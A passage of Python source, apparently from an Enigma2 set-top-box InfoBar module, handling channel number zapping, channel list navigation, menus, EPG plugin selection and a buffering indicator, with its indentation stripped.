for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool TV Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolEasyGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Easy Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolChannelGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Channel Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def checkHideVBI(self):
service = self.session.nav.getCurrentlyPlayingServiceReference()
servicepath = service and service.getPath()
if servicepath and servicepath.startswith("/"):
if service.toString().startswith("1:"):
info = eServiceCenter.getInstance().info(service)
service = info and info.getInfoString(service, iServiceInformation.sServiceref)
FLAG_HIDE_VBI = 512
return service and eDVBDB.getInstance().getFlag(eServiceReference(service)) & FLAG_HIDE_VBI and True
else:
return ".hidvbi." in servicepath.lower()
service = self.session.nav.getCurrentService()
info = service and service.info()
return info and info.getInfo(iServiceInformation.sHideVBI)
def showHideVBI(self):
if self.checkHideVBI():
self.hideVBILineScreen.show()
else:
self.hideVBILineScreen.hide()
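# Sketch of the dimming arithmetic used by doHide()/doWriteAlpha() above:
# each DimmingTimer tick writes osd_alpha * dimmed / speed, so the OSD fades
# linearly from full alpha to 0 over `speed` ticks (integer maths, as in the
# code above; illustrative only).
def _demoDimmingRamp(osd_alpha=255, speed=5):
	return [osd_alpha * step / speed for step in range(speed, -1, -1)]
# _demoDimmingRamp() -> [255, 204, 153, 102, 51, 0]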
class BufferIndicator(Screen):
def __init__(self, session):
Screen.__init__(self, session)
self["status"] = Label()
self.mayShow = False
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evBuffering: self.bufferChanged,
iPlayableService.evStart: self.__evStart,
iPlayableService.evGstreamerPlayStarted: self.__evGstreamerPlayStarted,
})
def bufferChanged(self):
if self.mayShow:
service = self.session.nav.getCurrentService()
info = service and service.info()
if info:
value = info.getInfo(iServiceInformation.sBuffer)
if value and value != 100:
self["status"].setText(_("Buffering %d%%") % value)
if not self.shown:
self.show()
def __evStart(self):
self.mayShow = True
self.hide()
def __evGstreamerPlayStarted(self):
self.mayShow = False
self.hide()
class InfoBarBuffer():
def __init__(self):
self.bufferScreen = self.session.instantiateDialog(BufferIndicator)
self.bufferScreen.hide()
class NumberZap(Screen):
def quit(self):
self.Timer.stop()
self.close()
def keyOK(self):
self.Timer.stop()
self.close(self.service, self.bouquet)
def handleServiceName(self):
if self.searchNumber:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()))
self["servicename"].setText(ServiceReference(self.service).getServiceName())
if not self.startBouquet:
self.startBouquet = self.bouquet
def keyBlue(self):
self.Timer.start(3000, True)
if self.searchNumber:
if self.startBouquet == self.bouquet:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()), firstBouquetOnly = True)
else:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()))
self["servicename"].setText(ServiceReference(self.service).getServiceName())
def keyNumberGlobal(self, number):
if config.usage.numzaptimeoutmode.value is not "off":
if config.usage.numzaptimeoutmode.value is "standard":
self.Timer.start(1000, True)
else:
self.Timer.start(config.usage.numzaptimeout2.value, True)
self.numberString += str(number)
self["number"].setText(self.numberString)
self["servicenumber"].setText(self.numberString)
self["number_summary"].setText(self.numberString)
self.field = self.numberString
self.handleServiceName()
self["service_summary"].setText(self["servicename"].getText())
if config.usage.numzappicon.value:
self.showPicon()
if len(self.numberString) >= int(config.usage.maxchannelnumlen.value):
self.keyOK()
def showPicon(self):
self["Service"].newService(self.service)
def __init__(self, session, number, searchNumberFunction = None):
Screen.__init__(self, session)
if config.usage.numzappicon.value:
self.onLayoutFinish.append(self.showPicon)
self.skinName = ["NumberZapPicon", "NumberZapWithName"]
self.onChangedEntry = [ ]
self.numberString = str(number)
self.field = str(number)
self.searchNumber = searchNumberFunction
self.startBouquet = None
self["channel"] = Label(_("Channel:"))
self["channel_summary"] = StaticText(_("Channel:"))
self["number"] = Label(self.numberString)
self["servicenumber"] = Label(self.numberString)
self["number_summary"] = StaticText(self.numberString)
self["servicename"] = Label()
self["service_summary"] = StaticText("")
self["Service"] = ServiceEvent()
self.handleServiceName()
self["service_summary"].setText(self["servicename"].getText())
self["actions"] = NumberActionMap( [ "SetupActions", "ShortcutActions" ],
{
"cancel": self.quit,
"ok": self.keyOK,
"blue": self.keyBlue,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal
})
self.Timer = eTimer()
self.Timer.callback.append(self.keyOK)
if config.usage.numzaptimeoutmode.value is not "off":
if config.usage.numzaptimeoutmode.value is "standard":
self.Timer.start(3000, True)
else:
self.Timer.start(config.usage.numzaptimeout1.value, True)
class InfoBarNumberZap:
""" Handles an initial number for NumberZapping """
def __init__(self):
self["NumberActions"] = NumberActionMap( [ "NumberActions"],
{
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal,
})
def keyNumberGlobal(self, number):
if self.pvrStateDialog.has_key("PTSSeekPointer") and self.timeshiftEnabled() and self.isSeekable():
InfoBarTimeshiftState._mayShow(self)
self.pvrStateDialog["PTSSeekPointer"].setPosition((self.pvrStateDialog["PTSSeekBack"].instance.size().width()-4)/2, self.pvrStateDialog["PTSSeekPointer"].position[1])
if self.seekstate != self.SEEK_STATE_PLAY:
self.setSeekState(self.SEEK_STATE_PLAY)
self.ptsSeekPointerOK()
return
if self.pts_blockZap_timer.isActive():
return
# if self.save_current_timeshift and self.timeshiftEnabled():
# InfoBarTimeshift.saveTimeshiftActions(self)
# return
if number == 0:
if isinstance(self, InfoBarPiP) and self.pipHandles0Action():
self.pipDoHandle0Action()
elif len(self.servicelist.history) > 1 or config.usage.panicbutton.value:
self.checkTimeshiftRunning(self.recallPrevService)
else:
if self.has_key("TimeshiftActions") and self.timeshiftEnabled():
ts = self.getTimeshift()
if ts and ts.isTimeshiftActive():
return
self.session.openWithCallback(self.numberEntered, NumberZap, number, self.searchNumber)
def recallPrevService(self, reply):
if reply:
if config.usage.panicbutton.value:
if self.session.pipshown:
del self.session.pip
self.session.pipshown = False
self.servicelist.history_tv = []
self.servicelist.history_radio = []
self.servicelist.history = self.servicelist.history_tv
self.servicelist.history_pos = 0
self.servicelist2.history_tv = []
self.servicelist2.history_radio = []
self.servicelist2.history = self.servicelist.history_tv
self.servicelist2.history_pos = 0
if config.usage.multibouquet.value:
bqrootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
else:
self.service_types = service_types_tv
bqrootstr = '%s FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet'% self.service_types
serviceHandler = eServiceCenter.getInstance()
rootbouquet = eServiceReference(bqrootstr)
bouquet = eServiceReference(bqrootstr)
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if bouquet.flags & eServiceReference.isDirectory:
self.servicelist.clearPath()
self.servicelist.setRoot(bouquet)
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
serviceIterator = servicelist.getNext()
while serviceIterator.valid():
service, bouquet2 = self.searchNumber(config.usage.panicchannel.value)
if service == serviceIterator: break
serviceIterator = servicelist.getNext()
if serviceIterator.valid() and service == serviceIterator: break
self.servicelist.enterPath(rootbouquet)
self.servicelist.enterPath(bouquet)
self.servicelist.saveRoot()
self.servicelist2.enterPath(rootbouquet)
self.servicelist2.enterPath(bouquet)
self.servicelist2.saveRoot()
self.selectAndStartService(service, bouquet)
else:
self.servicelist.recallPrevService()
def numberEntered(self, service = None, bouquet = None):
if service:
self.selectAndStartService(service, bouquet)
def searchNumberHelper(self, serviceHandler, num, bouquet):
servicelist = serviceHandler.list(bouquet)
if servicelist:
serviceIterator = servicelist.getNext()
while serviceIterator.valid():
if num == serviceIterator.getChannelNum():
return serviceIterator
serviceIterator = servicelist.getNext()
return None
def searchNumber(self, number, firstBouquetOnly=False, bouquet=None):
bouquet = bouquet or self.servicelist.getRoot()
service = None
serviceHandler = eServiceCenter.getInstance()
if not firstBouquetOnly:
service = self.searchNumberHelper(serviceHandler, number, bouquet)
if config.usage.multibouquet.value and not service:
bouquet = self.servicelist.bouquet_root
bouquetlist = serviceHandler.list(bouquet)
if bouquetlist:
bouquet = bouquetlist.getNext()
while bouquet.valid():
if bouquet.flags & eServiceReference.isDirectory:
service = self.searchNumberHelper(serviceHandler, number, bouquet)
if service:
playable = not (service.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)) or (service.flags & eServiceReference.isNumberedMarker)
if not playable:
service = None
break
if config.usage.alternative_number_mode.value or firstBouquetOnly:
break
bouquet = bouquetlist.getNext()
return service, bouquet
def selectAndStartService(self, service, bouquet):
if service:
if self.servicelist.getRoot() != bouquet: #already in correct bouquet?
self.servicelist.clearPath()
if self.servicelist.bouquet_root != bouquet:
self.servicelist.enterPath(self.servicelist.bouquet_root)
self.servicelist.enterPath(bouquet)
self.servicelist.setCurrentSelection(service) #select the service in servicelist
self.servicelist.zap(enable_pipzap = True)
self.servicelist.correctChannelNumber()
self.servicelist.startRoot = None
def zapToNumber(self, number):
service, bouquet = self.searchNumber(number)
self.selectAndStartService(service, bouquet)
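# Standalone sketch of the channel-number search above.  _FakeChannelList
# mimics just the iterator surface this code relies on (getNext() plus
# valid()/getChannelNum() on the returned items); it is a hypothetical
# stand-in, not the real eServiceCenter API.
class _FakeChannel(object):
	def __init__(self, num):
		self.num = num
	def valid(self):
		return self.num is not None
	def getChannelNum(self):
		return self.num

class _FakeChannelList(object):
	def __init__(self, nums):
		self._items = [_FakeChannel(n) for n in nums] + [_FakeChannel(None)]
	def getNext(self):
		return self._items.pop(0)

def _demoSearchNumberHelper(nums, wanted):
	servicelist = _FakeChannelList(nums)
	serviceIterator = servicelist.getNext()
	while serviceIterator.valid():
		if wanted == serviceIterator.getChannelNum():
			return serviceIterator
		serviceIterator = servicelist.getNext()
	return None
# _demoSearchNumberHelper([1, 3, 7], 3).getChannelNum() -> 3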
config.misc.initialchannelselection = ConfigBoolean(default = True)
class InfoBarChannelSelection:
""" ChannelSelection - handles the channelSelection dialog and the initial
channelChange actions which open the channelSelection dialog """
def __init__(self):
#instantiate forever
self.servicelist = self.session.instantiateDialog(ChannelSelection)
self.servicelist2 = self.session.instantiateDialog(PiPZapSelection)
self.tscallback = None
if config.misc.initialchannelselection.value:
self.onShown.append(self.firstRun)
self["ChannelSelectActions"] = HelpableActionMap(self, "InfobarChannelSelection",
{
"switchChannelUp": (self.UpPressed, _("Open service list and select previous channel")),
"switchChannelDown": (self.DownPressed, _("Open service list and select next channel")),
"switchChannelUpLong": (self.switchChannelUp, _("Open service list and select previous channel for PiP")),
"switchChannelDownLong": (self.switchChannelDown, _("Open service list and select next channel for PiP")),
"zapUp": (self.zapUp, _("Switch to previous channel")),
"zapDown": (self.zapDown, _("Switch next channel")),
"volumeUp": (self.volumeUp, _("change Volume up")),
"volumeDown": (self.volumeDown, _("change Volume down")),
"historyBack": (self.historyBack, _("Switch to previous channel in history")),
"historyNext": (self.historyNext, _("Switch to next channel in history")),
"openServiceList": (self.openServiceList, _("Open service list")),
"openSatellites": (self.openSatellites, _("Open satellites list")),
"openBouquets": (self.openBouquets, _("Open favourites list")),
"LeftPressed": self.LeftPressed,
"RightPressed": self.RightPressed,
"ChannelPlusPressed": self.ChannelPlusPressed,
"ChannelMinusPressed": self.ChannelMinusPressed,
"ChannelPlusPressedLong": self.ChannelPlusPressed,
"ChannelMinusPressedLong": self.ChannelMinusPressed,
})
def firstRun(self):
self.onShown.remove(self.firstRun)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.openServiceList()
def LeftPressed(self):
if config.plisettings.InfoBarEpg_mode.value == "3":
self.openInfoBarEPG()
else:
self.zapUp()
def RightPressed(self):
if config.plisettings.InfoBarEpg_mode.value == "3":
self.openInfoBarEPG()
else:
self.zapDown()
def UpPressed(self):
if config.usage.updownbutton_mode.value == "0":
self.zapDown()
elif config.usage.updownbutton_mode.value == "1":
self.switchChannelUp()
def DownPressed(self):
if config.usage.updownbutton_mode.value == "0":
self.zapUp()
elif config.usage.updownbutton_mode.value == "1":
self.switchChannelDown()
def ChannelPlusPressed(self):
if config.usage.channelbutton_mode.value == "0":
self.zapDown()
elif config.usage.channelbutton_mode.value == "1" or config.usage.channelbutton_mode.value == "3":
self.openServiceList()
elif config.usage.channelbutton_mode.value == "2":
self.serviceListType = "Norm"
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def ChannelMinusPressed(self):
if config.usage.channelbutton_mode.value == "0":
self.zapUp()
elif config.usage.channelbutton_mode.value == "1" or config.usage.channelbutton_mode.value == "3":
self.openServiceList()
elif config.usage.channelbutton_mode.value == "2":
self.serviceListType = "Norm"
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def showTvChannelList(self, zap=False):
self.servicelist.setModeTv()
if zap:
self.servicelist.zap()
if config.usage.show_servicelist.value:
self.session.execDialog(self.servicelist)
def showRadioChannelList(self, zap=False):
self.servicelist.setModeRadio()
if zap:
self.servicelist.zap()
if config.usage.show_servicelist.value:
self.session.execDialog(self.servicelist)
def historyBack(self):
if config.usage.historymode.value == "0":
self.servicelist.historyBack()
else:
self.servicelist.historyZap(-1)
def historyNext(self):
if config.usage.historymode.value == "0":
self.servicelist.historyNext()
else:
self.servicelist.historyZap(+1)
def switchChannelUp(self):
if not self.secondInfoBarScreen or not self.secondInfoBarScreen.shown:
self.keyHide()
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist.moveUp()
self.session.execDialog(self.servicelist)
else:
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
elif self.LongButtonPressed:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist2.moveUp()
self.session.execDialog(self.servicelist2)
else:
self.servicelist2.showFavourites()
self.session.execDialog(self.servicelist2)
def switchChannelDown(self):
if not self.secondInfoBarScreen or not self.secondInfoBarScreen.shown:
self.keyHide()
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist.moveDown()
self.session.execDialog(self.servicelist)
else:
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
elif self.LongButtonPressed:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist2.moveDown()
self.session.execDialog(self.servicelist2)
else:
self.servicelist2.showFavourites()
self.session.execDialog(self.servicelist2)
def openServiceList(self):
self.session.execDialog(self.servicelist)
def openServiceListPiP(self):
self.session.execDialog(self.servicelist2)
def openSatellites(self):
self.servicelist.showSatellites()
self.session.execDialog(self.servicelist)
def openBouquets(self):
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def zapUp(self):
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if self.pts_blockZap_timer.isActive():
return
self["SeekActionsPTS"].setEnabled(False)
if self.servicelist.inBouquet():
prev = self.servicelist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist.atBegin():
self.servicelist.prevBouquet()
self.servicelist.moveEnd()
else:
self.servicelist.moveUp()
cur = self.servicelist.getCurrentSelection()
if cur:
if self.servicelist.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist.moveUp()
self.servicelist.zap(enable_pipzap = True)
elif self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.open(MessageBox, _("Please open Picture in Picture first"), MessageBox.TYPE_ERROR)
return
from Screens.ChannelSelection import ChannelSelection
ChannelSelectionInstance = ChannelSelection.instance
ChannelSelectionInstance.dopipzap = True
if self.servicelist2.inBouquet():
prev = self.servicelist2.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist2.atBegin():
self.servicelist2.prevBouquet()
self.servicelist2.moveEnd()
else:
self.servicelist2.moveUp()
cur = self.servicelist2.getCurrentSelection()
if cur:
if ChannelSelectionInstance.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist2.moveUp()
self.servicelist2.zap(enable_pipzap = True)
ChannelSelectionInstance.dopipzap = False
if self.timeshiftEnabled() and self.isSeekable():
self["SeekActionsPTS"].setEnabled(True)
def zapDown(self):
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if self.pts_blockZap_timer.isActive():
return
self["SeekActionsPTS"].setEnabled(False)
if self.servicelist.inBouquet():
prev = self.servicelist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist.atEnd():
self.servicelist.nextBouquet()
self.servicelist.moveTop()
else:
self.servicelist.moveDown()
cur = self.servicelist.getCurrentSelection()
if cur:
if self.servicelist.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist.moveDown()
self.servicelist.zap(enable_pipzap = True)
elif self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.open(MessageBox, _("Please open Picture in Picture first"), MessageBox.TYPE_ERROR)
return
from Screens.ChannelSelection import ChannelSelection
ChannelSelectionInstance = ChannelSelection.instance
ChannelSelectionInstance.dopipzap = True
if self.servicelist2.inBouquet():
prev = self.servicelist2.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist2.atEnd():
self.servicelist2.nextBouquet()
self.servicelist2.moveTop()
else:
self.servicelist2.moveDown()
cur = self.servicelist2.getCurrentSelection()
if cur:
if ChannelSelectionInstance.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist2.moveDown()
self.servicelist2.zap(enable_pipzap = True)
ChannelSelectionInstance.dopipzap = False
if self.timeshiftEnabled() and self.isSeekable():
self["SeekActionsPTS"].setEnabled(True)
def volumeUp(self):
VolumeControl.instance.volUp()
def volumeDown(self):
VolumeControl.instance.volDown()
class InfoBarMenu:
""" Handles a menu action, to open the (main) menu """
def __init__(self):
self["MenuActions"] = HelpableActionMap(self, "InfobarMenuActions",
{
"mainMenu": (self.mainMenu, _("Enter main menu...")),
"showNetworkSetup": (self.showNetworkMounts, _("Show network mounts ...")),
"showSystemSetup": (self.showSystemMenu, _("Show network mounts ...")),
"showRFmod": (self.showRFSetup, _("Show RFmod setup...")),
"toggleAspectRatio": (self.toggleAspectRatio, _("Toggle aspect ratio...")),
})
self.session.infobar = None
def mainMenu(self):
# print "loading mainmenu XML..."
menu = mdom.getroot()
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.infobar = self
# so we can access the currently active infobar from screens opened from within the mainmenu
# at the moment used from the SubserviceSelection
self.session.openWithCallback(self.mainMenuClosed, MainMenu, menu)
def mainMenuClosed(self, *val):
self.session.infobar = None
def toggleAspectRatio(self):
ASPECT = [ "auto", "16:9", "4:3" ]
ASPECT_MSG = { "auto":"Auto", "16:9":"16:9", "4:3":"4:3" }
if config.av.aspect.value in ASPECT:
index = ASPECT.index(config.av.aspect.value)
config.av.aspect.value = ASPECT[(index+1)%3]
else:
config.av.aspect.value = "auto"
config.av.aspect.save()
self.session.open(MessageBox, _("AV aspect is %s." % ASPECT_MSG[config.av.aspect.value]), MessageBox.TYPE_INFO, timeout=5)
def showSystemMenu(self):
menulist = mdom.getroot().findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'setup_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'system_selection':
menu = item
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.openWithCallback(self.mainMenuClosed, Menu, menu)
def showNetworkMounts(self):
menulist = mdom.getroot().findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'setup_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'extended_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'network_menu':
menu = item
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.openWithCallback(self.mainMenuClosed, Menu, menu)
def showRFSetup(self):
if SystemInfo["RfModulator"]:
self.session.openWithCallback(self.mainMenuClosed, Setup, 'RFmod')
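# Sketch of the cycling rule in toggleAspectRatio() above: the next aspect is
# ASPECT[(index + 1) % 3], so "auto" -> "16:9" -> "4:3" -> "auto", and any
# unknown current value falls back to "auto" (illustrative only).
def _demoNextAspect(current):
	ASPECT = ["auto", "16:9", "4:3"]
	if current in ASPECT:
		return ASPECT[(ASPECT.index(current) + 1) % 3]
	return "auto"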
class InfoBarSimpleEventView:
""" Opens the Eventview for now/next """
def __init__(self):
self["EPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"showEventInfo": (self.openEventView, _("show event details")),
"InfoPressed": (self.openEventView, _("show event details")),
"showInfobarOrEpgWhenInfobarAlreadyVisible": self.showEventInfoWhenNotVisible,
})
def openEventView(self, simple=False):
if self.servicelist is None:
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack.append(self.eventView)
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def showEventInfoWhenNotVisible(self):
if self.shown:
self.openEventView()
else:
self.toggleShow()
return 1
class SimpleServicelist:
def __init__(self, services):
self.services = services
self.length = len(services)
self.current = 0
def selectService(self, service):
if not self.length:
self.current = -1
return False
else:
self.current = 0
while self.services[self.current].ref != service:
self.current += 1
if self.current >= self.length:
return False
return True
def nextService(self):
if not self.length:
return
if self.current+1 < self.length:
self.current += 1
else:
self.current = 0
def prevService(self):
if not self.length:
return
if self.current-1 > -1:
self.current -= 1
else:
self.current = self.length - 1
def currentService(self):
if not self.length or self.current >= self.length:
return None
return self.services[self.current]
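# Usage sketch (illustrative, not part of upstream): SimpleServicelist keeps
# a cyclic cursor over any objects carrying a .ref attribute.
def _demoSimpleServicelist():
	class _Svc(object):
		def __init__(self, ref):
			self.ref = ref
	a, b = _Svc('refA'), _Svc('refB')
	sl = SimpleServicelist([a, b])
	assert sl.selectService('refB')
	sl.nextService()              # cursor wraps past the end
	assert sl.currentService() is a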
class InfoBarEPG:
""" EPG - Opens an EPG list when the showEPGList action fires """
def __init__(self):
self.is_now_next = False
self.dlg_stack = []
self.bouquetSel = None
self.eventView = None
self.isInfo = None
self.epglist = []
self.defaultEPGType = self.getDefaultEPGtype()
self.defaultGuideType = self.getDefaultGuidetype()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.__evEventInfoChanged,
})
self["EPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"RedPressed": (self.RedPressed, _("Show epg")),
"IPressed": (self.IPressed, _("show program information...")),
"InfoPressed": (self.InfoPressed, _("show program information...")),
"showEventInfoPlugin": (self.showEventInfoPlugins, _("List EPG functions...")),
"EPGPressed": (self.showDefaultEPG, _("show EPG...")),
"showEventGuidePlugin": (self.showEventGuidePlugins, _("List EPG functions...")),
"showInfobarOrEpgWhenInfobarAlreadyVisible": self.showEventInfoWhenNotVisible,
})
def getEPGPluginList(self):
pluginlist = [(p.name, boundFunction(self.runPlugin, p)) for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EVENTINFO)]
if pluginlist:
pluginlist.append((_("Event Info"), self.openEventView))
pluginlist.append((_("Graphical EPG"), self.openGraphEPG))
pluginlist.append((_("Infobar EPG"), self.openInfoBarEPG))
pluginlist.append((_("Multi EPG"), self.openMultiServiceEPG))
pluginlist.append((_("Show EPG for current channel..."), self.openSingleServiceEPG))
return pluginlist
def getDefaultEPGtype(self):
pluginlist = self.getEPGPluginList()
config.usage.defaultEPGType=ConfigSelection(default = "None", choices = pluginlist)
for plugin in pluginlist:
if plugin[0] == config.usage.defaultEPGType.value:
return plugin[1]
return None
def showEventInfoPlugins(self):
if isMoviePlayerInfoBar(self):
self.openEventView()
else:
pluginlist = self.getEPGPluginList()
if pluginlist:
# pluginlist.append((_("Select default EPG type..."), self.SelectDefaultInfoPlugin))
self.session.openWithCallback(self.EventInfoPluginChosen, ChoiceBox, title=_("Please choose an extension..."), list = pluginlist, skin_name = "EPGExtensionsList")
else:
self.openSingleServiceEPG()
def SelectDefaultInfoPlugin(self):
self.session.openWithCallback(self.DefaultInfoPluginChosen, ChoiceBox, title=_("Please select a default EPG type..."), list = self.getEPGPluginList(), skin_name = "EPGExtensionsList")
def DefaultInfoPluginChosen(self, answer):
if answer is not None:
self.defaultEPGType = answer[1]
config.usage.defaultEPGType.value = answer[0]
config.usage.defaultEPGType.save()
configfile.save()
def getDefaultGuidetype(self):
pluginlist = self.getEPGPluginList()
config.usage.defaultGuideType=ConfigSelection(default = "None", choices = pluginlist)
for plugin in pluginlist:
if plugin[0] == config.usage.defaultGuideType.value:
return plugin[1]
return None
def showEventGuidePlugins(self):
if isMoviePlayerInfoBar(self):
self.openEventView()
else:
pluginlist = self.getEPGPluginList()
if pluginlist:
pluginlist.append((_("Select default EPG type..."), self.SelectDefaultGuidePlugin))
self.session.openWithCallback(self.EventGuidePluginChosen, ChoiceBox, title=_("Please choose an extension..."), list = pluginlist, skin_name = "EPGExtensionsList")
else:
self.openSingleServiceEPG()
def SelectDefaultGuidePlugin(self):
self.session.openWithCallback(self.DefaultGuidePluginChosen, ChoiceBox, title=_("Please select a default EPG type..."), list = self.getEPGPluginList(), skin_name = "EPGExtensionsList")
def DefaultGuidePluginChosen(self, answer):
if answer is not None:
self.defaultGuideType = answer[1]
config.usage.defaultGuideType.value = answer[0]
config.usage.defaultGuideType.save()
def EventGuidePluginChosen(self, answer):
if answer is not None:
answer[1]()
def runPlugin(self, plugin):
plugin(session = self.session, servicelist=self.servicelist)
def EventInfoPluginChosen(self, answer):
if answer is not None:
answer[1]()
def RedPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.usage.defaultEPGType.value != _("Graphical EPG") and config.usage.defaultEPGType.value != _("None"):
self.openGraphEPG()
else:
self.openSingleServiceEPG()
def InfoPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.plisettings.PLIINFO_mode.value == "eventview":
self.openEventView()
elif config.plisettings.PLIINFO_mode.value == "epgpress":
self.showDefaultEPG()
elif config.plisettings.PLIINFO_mode.value == "single":
self.openSingleServiceEPG()
elif config.plisettings.PLIINFO_mode.value == "coolinfoguide" and COOLTVGUIDE:
self.showCoolInfoGuide()
elif config.plisettings.PLIINFO_mode.value == "coolsingleguide" and COOLTVGUIDE:
self.showCoolSingleGuide()
elif config.plisettings.PLIINFO_mode.value == "cooltvguide" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
else:
if config.plisettings.PLIINFO_mode.value != "infobar":
self.showDefaultEPG()
def IPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
self.openEventView()
def EPGPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.plisettings.PLIEPG_mode.value == "pliepg":
self.openGraphEPG()
elif config.plisettings.PLIEPG_mode.value == "multi":
self.openMultiServiceEPG()
elif config.plisettings.PLIEPG_mode.value == "single":
self.openSingleServiceEPG()
elif config.plisettings.PLIEPG_mode.value == "merlinepgcenter":
